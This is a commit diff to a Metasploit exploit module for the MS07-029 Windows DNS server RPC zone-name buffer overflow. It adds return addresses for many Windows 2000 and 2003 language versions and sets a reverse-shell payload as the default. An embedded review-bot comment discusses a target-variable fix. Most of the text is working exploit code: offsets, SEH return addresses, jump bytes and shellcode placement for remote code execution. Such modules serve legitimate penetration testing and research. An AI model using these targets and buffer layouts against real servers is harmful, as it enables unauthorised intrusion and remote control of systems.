Land #15918, add more targets for ms07_029_msdns_zonename

Tim W 2021-11-30 08:24:03 +00:00
commit abb11cf896
GPG Key ID: 217FBA50ABBAABEF
2 changed files with 48 additions and 26 deletions


@ -21,7 +21,8 @@ class MetasploitModule < Msf::Exploit::Remote
'Author' =>
[
'hdm', # initial module
'Unknown' # 2 unknown contributors (2003 support)
'Unknown', # 2 unknown contributors (2003 support)
'bcoles' # additional target offsets
],
'License' => MSF_LICENSE,
'References' =>
@ -33,7 +34,8 @@ class MetasploitModule < Msf::Exploit::Remote
'Privileged' => true,
'DefaultOptions' =>
{
'EXITFUNC' => 'thread'
'EXITFUNC' => 'thread',
'PAYLOAD' => 'windows/shell/reverse_tcp'
},
'Payload' =>
{
@ -48,12 +50,22 @@ class MetasploitModule < Msf::Exploit::Remote
'Platform' => 'win',
'Targets' =>
[
[ 'Automatic (2000 SP0-SP4, 2003 SP0, 2003 SP1-SP2)', { } ],
[ 'Automatic (2000 SP0-SP4, 2003 SP0-SP2)', { } ],
# WS2HELP.DLL
# p/p/r WS2HELP.DLL
[ 'Windows 2000 Server SP0-SP4+ English', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x75022ac4 } ],
[ 'Windows 2000 Server SP0-SP4+ Italian', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74fd2ac4 } ],
[ 'Windows 2000 Server SP0-SP4+ French', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74fa2ac4 } ],
[ 'Windows 2000 Server SP0-SP4+ German', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74f92ac4 } ],
[ 'Windows 2000 Server SP0-SP4+ Italian', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74fd2ac4 } ],
[ 'Windows 2000 Server SP0-SP4+ Polish', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74fb2ac4 } ],
[ 'Windows 2000 Server SP0-SP4+ Portuguese', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74fd2ac4 } ],
[ 'Windows 2000 Server SP0-SP4+ Korean', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74f92ac4 } ],
[ 'Windows 2000 Server SP0-SP4+ Russian', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74fb2ac4 } ],
[ 'Windows 2000 Server SP0-SP4+ Simplified Chinese', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74fa2ac4 } ],
[ 'Windows 2000 Server SP0-SP4+ Spanish', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74fd2ac4 } ],
[ 'Windows 2000 Server SP0-SP4+ Swedish', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74fa2ac4 } ],
[ 'Windows 2000 Server SP0-SP4+ Traditional Chinese', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74fa2ac4 } ],
[ 'Windows 2000 Server SP0-SP4+ Turkish', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74fc2ac4 } ],
# Use the __except_handler3 method (and jmp esp in ATL.dll)
[ 'Windows 2003 Server SP0 English', { 'OS' => '2003SP0', 'Off' => 1593, 'Rets' => [0x77f45a34, 0x77f7e7f0, 0x76a935bf] } ],
@ -65,7 +77,8 @@ class MetasploitModule < Msf::Exploit::Remote
[ 'Windows 2003 Server SP1-SP2 Spanish', { 'OS' => '2003SP12', 'Off' => 1633, 'IB' => 0x76a30000 } ],
[ 'Windows 2003 Server SP1-SP2 Italian', { 'OS' => '2003SP12', 'Off' => 1633, 'IB' => 0x76970000 } ],
[ 'Windows 2003 Server SP1-SP2 German', { 'OS' => '2003SP12', 'Off' => 1633, 'IB' => 0x76970000 } ],
[ 'Windows 2003 Server SP1-SP2 Russian', { 'OS' => '2003SP12', 'Off' => 1633, 'IB' => 0x769a0000 } ],
[ 'Windows 2003 Server SP1-SP2 Simplified Chinese', { 'OS' => '2003SP12', 'Off' => 1633, 'IB' => 0x769c0000 } ],
],
'DisclosureDate' => '2007-04-12',
'DefaultTarget' => 0 ))
@ -138,8 +151,7 @@ class MetasploitModule < Msf::Exploit::Remote
end
if (not mytarget)
print_error("There is no available target for this locale")
return
fail_with(Failure::NoTarget, "There is no available target for '#{datastore['LOCALE']}' locale")
end
else
mytarget = target
@ -149,7 +161,7 @@ class MetasploitModule < Msf::Exploit::Remote
# Connect to the high RPC port
connect(true, { 'RPORT' => dport })
print_status("Trying target #{target.name}...")
print_status("Trying target #{mytarget.name}...")
# Bind to the service
handle = dcerpc_handle('50abc2a4-574d-40b3-9d66-ee4fd5fba076', '5.0', 'ncacn_ip_tcp', [datastore['RPORT']])
@ -160,18 +172,18 @@ class MetasploitModule < Msf::Exploit::Remote
# Create our buffer with our shellcode first
txt = Rex::Text.rand_text_alphanumeric(8192)
if (target['OS'] =~ /2000/)
if (mytarget['OS'] =~ /2000/)
txt[0, payload.encoded.length] = payload.encoded
off = target['Off']
off = mytarget['Off']
txt[ off ] = [mytarget.ret].pack('V')
txt[ off - 4, 2] = "\xeb\x06"
txt[ off + 4, 5] = "\xe9" + [ (off+9) * -1 ].pack('V')
elsif (target['OS'] =~ /2003SP0/)
elsif (mytarget['OS'] =~ /2003SP0/)
txt[0, payload.encoded.length] = payload.encoded
off = target['Off']
off = mytarget['Off']
txt[ off ] = [mytarget['Rets'][0]].pack('V') # __except_handler3
txt[ off - 4, 2] = "\xeb\x16"
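Review bot: The `target` → `mytarget` switch in the buffer-building branches is a genuine fix rather than a rename — when the index-0 'Automatic' entry is selected its options hash is `{ }`, so `target['OS']` and `target['Off']` were nil while `mytarget.ret` on the unchanged line already used the resolved target — but the method continues past the end of this hunk and the `2003SP12` branch is not visible here, so it is worth confirming that every remaining `target[...]` lookup in that branch was converted as well, otherwise the automatic path still breaks further down. On the new condition lines the parentheses are unidiomatic and no capture is used, so `if mytarget['OS'].match?(/2000/)` and `elsif mytarget['OS'].match?(/2003SP0/)` read cleaner; note that `match?` raises on nil where `=~` silently returned nil, which is only acceptable because the `fail_with(Failure::NoTarget, …)` guard above ensures a resolved target is present. The same `target`/`mytarget` mismatch appeared in the `print_status("Trying target …")` line, which this hunk's predecessor also corrects.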


@ -25,7 +25,8 @@ class MetasploitModule < Msf::Exploit::Remote
'Author' =>
[
'hdm', # initial module
'Unknown' # 2 unknown contributors (2003 support)
'Unknown', # 2 unknown contributors (2003 support)
'bcoles' # additional target offsets
],
'License' => MSF_LICENSE,
'References' =>
@ -37,7 +38,8 @@ class MetasploitModule < Msf::Exploit::Remote
'Privileged' => true,
'DefaultOptions' =>
{
'EXITFUNC' => 'thread'
'EXITFUNC' => 'thread',
'PAYLOAD' => 'windows/shell/reverse_tcp'
},
'Payload' =>
{
@ -52,25 +54,35 @@ class MetasploitModule < Msf::Exploit::Remote
'Platform' => 'win',
'Targets' =>
[
[ 'Automatic (2000 SP0-SP4, 2003 SP0, 2003 SP1-SP2)', { } ],
[ 'Automatic (2000 SP0-SP4, 2003 SP0-SP2)', { } ],
# WS2HELP.DLL
# p/p/r WS2HELP.DLL
[ 'Windows 2000 Server SP0-SP4+ English', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x75022ac4 } ],
[ 'Windows 2000 Server SP0-SP4+ Italian', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74fd2ac4 } ],
[ 'Windows 2000 Server SP0-SP4+ French', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74fa2ac4 } ],
[ 'Windows 2000 Server SP0-SP4+ German', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74f92ac4 } ],
[ 'Windows 2000 Server SP0-SP4+ Italian', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74fd2ac4 } ],
[ 'Windows 2000 Server SP0-SP4+ Polish', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74fb2ac4 } ],
[ 'Windows 2000 Server SP0-SP4+ Portuguese', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74fd2ac4 } ],
[ 'Windows 2000 Server SP0-SP4+ Korean', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74f92ac4 } ],
[ 'Windows 2000 Server SP0-SP4+ Russian', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74fb2ac4 } ],
[ 'Windows 2000 Server SP0-SP4+ Simplified Chinese', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74fa2ac4 } ],
[ 'Windows 2000 Server SP0-SP4+ Spanish', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74fd2ac4 } ],
[ 'Windows 2000 Server SP0-SP4+ Swedish', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74fa2ac4 } ],
[ 'Windows 2000 Server SP0-SP4+ Traditional Chinese', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74fa2ac4 } ],
[ 'Windows 2000 Server SP0-SP4+ Turkish', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74fc2ac4 } ],
# Use the __except_handler3 method (and jmp esp in ATL.dll)
[ 'Windows 2003 Server SP0 English', { 'OS' => '2003SP0', 'Off' => 1593, 'Rets' => [0x77f45a34, 0x77f7e7f0, 0x76a935bf] } ],
[ 'Windows 2003 Server SP0 French', { 'OS' => '2003SP0', 'Off' => 1593, 'Rets' => [0x77f35a34, 0x77f6e7f0, 0x76a435bf] } ],
# ATL.DLL (bypass DEP/NX, IB -> Image Base of ATL.dll)
[ 'Windows 2003 Server SP1-SP2 English', { 'OS' => '2003SP12', 'Off' => 1633, 'IB' => 0x76a80000 } ],
[ 'Windows 2003 Server SP1-SP2 French', { 'OS' => '2003SP12', 'Off' => 1633, 'IB' => 0x76a30000 } ],
[ 'Windows 2003 Server SP1-SP2 Spanish', { 'OS' => '2003SP12', 'Off' => 1633, 'IB' => 0x76a30000 } ],
[ 'Windows 2003 Server SP1-SP2 Italian', { 'OS' => '2003SP12', 'Off' => 1633, 'IB' => 0x76970000 } ],
[ 'Windows 2003 Server SP1-SP2 German', { 'OS' => '2003SP12', 'Off' => 1633, 'IB' => 0x76970000 } ],
[ 'Windows 2003 Server SP1-SP2 Russian', { 'OS' => '2003SP12', 'Off' => 1633, 'IB' => 0x769a0000 } ],
[ 'Windows 2003 Server SP1-SP2 Simplified Chinese', { 'OS' => '2003SP12', 'Off' => 1633, 'IB' => 0x769c0000 } ],
],
'DisclosureDate' => '2007-04-12',
'DefaultTarget' => 0 ))
@ -124,14 +136,12 @@ class MetasploitModule < Msf::Exploit::Remote
print_status("Detected a Windows 2003 SP#{$2} target...")
target = gettarget('2003SP12')
else
print_status("Unknown OS: #{smb_peer_os}")
return
fail_with(Failure::NoTarget, "No target for OS: #{smb_peer_os}")
end
end
if (not target)
print_status("There is no available target for this OS locale")
return
fail_with(Failure::NoTarget, "There is no available target for '#{datastore['LOCALE']}' locale")
end
print_status("Trying target #{target.name}...")